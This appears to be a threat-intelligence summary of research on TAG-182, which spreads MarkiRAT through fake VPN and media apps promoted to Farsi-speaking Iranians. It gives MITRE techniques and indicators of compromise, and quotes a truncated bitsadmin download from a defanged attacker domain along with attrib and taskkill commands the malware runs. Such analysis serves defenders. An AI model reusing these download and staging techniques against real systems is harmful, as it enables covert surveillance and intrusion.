TAG-182 is using MarkiRAT and fake Android apps, including VPN and media tools, to target Farsi-speaking Iranians through staged websites and social media, especially Instagram. The infrastructure and tradecraft overlap with Ferocious Kitten, while Iranian security and surveillance bodies appear to be expanding digital monitoring after the partial restoration of internet access in Iran. #TAG-182 #MarkiRAT #FerociousKitten #Instagram #Iranians
Keypoints
- TAG-182 is highly likely part of Iran’s surveillance ecosystem and uses MarkiRAT to collect intelligence from Iranian targets.
- The group distributes malware through fake Android applications posing as VPNs and media-player tools such as YESHICA and Pis2ray VPN.
- Insikt Group found infrastructure linked to TAG-182, including domains hosted on 212.83.61.198 and 46.30.191.105.
- TAG-182’s tradecraft overlaps with historical MarkiRAT activity attributed to Ferocious Kitten, including BITS-based download behavior.
- The group appears to focus on Farsi-speaking users and uses Instagram posts and staged websites to promote malicious downloads.
- Iranian authorities are likely increasing cyber surveillance and digital enforcement following renewed internet access and internal security concerns.
- The report suggests TAG-182 is likely tied to broader pro-Iranian surveillance actors, including GreenEcho, Ferocious Kitten, and Rampant Kitten.
MITRE Techniques
- [T1583.001 ] Acquire Infrastructure: Domains – TAG-182 registered and used multiple malicious domains to host staging sites and lure victims (‘custom-built a website that acts as a staging point’ and domains such as yeplayer[.]store, pis2ray[.]online).
- [T1566.001 ] Phishing: Spearphishing Attachment – The group delivered staged payload archives and installers as malicious downloads (‘free download tools’ and files such as YEPlayer[.]rar and Pis2rayVPN.msi).
- [T1566.002 ] Phishing: Spearphishing Link – Victims were directed to malicious websites and social media posts that promoted fake apps (‘social media threads … identified on Instagram’ and links to staging websites).
- [T1204.002 ] User Execution: Malicious File – Execution depended on users downloading and running the fake applications or extracted payloads (‘Upon extraction and execution of YEPlayer.exe’).
- [T1197 ] BITS Jobs – MarkiRAT used bitsadmin jobs to download files and stage payloads (‘bitsadmin /addfile pdj “hxxp[:]//microsotf[.]come-site[.]website/…’).
- [T1059.003 ] Windows Command Shell – The malware executed command-line actions such as attrib and taskkill to manipulate files and processes (‘attrib -h’ and ‘taskkill /im svehost.exe /t /f’).
Indicators of Compromise
- [SHA256 Hash ] MarkiRAT-related samples and staging files – 3b172281f65ceaee280ae810edb6fd39a1ecd25649f929f246c0405df94f4c89, 66dcd98c6b310f4429890821e609d48cc6395a6be15ffe5a121ec68b7a8f7402, and 2 more hashes.
- [File Name ] Malware and staging artifacts – YEPlayer.dll, YEMPlayer.zip, and other filenames such as Pis2rayVPN.msi and Pis2rayN.dll.
- [Domain ] Malicious staging and C2 domains – yeplayer[.]store, microsotf[.]comi-site[.]website, and other domains such as starvpn[.]pis2ray[.]online and comisignin[.]online.
- [IP Address ] Infrastructure hosting TAG-182 domains – 212[.]83[.]61[.]198, 46[.]30[.]191[.]105, and other IPs including 45[.]86[.]162[.]197 and 89[.]144[.]145[.]237.
- [URL / Path ] Payload delivery and beaconing paths – /files/YEPlayer[.]rar, /up/uploadx.php, and /i.php?u= used for staging and exfiltration-related communication.
- [File Path ] Malware drop locations and manipulation paths – C:UsersPublicAppDataWindowssvehost.exe and %PUBLIC%AppDataLibsp.b.
Read more: https://www.recordedfuture.com/research/nexus-tag182-disseminates-markirat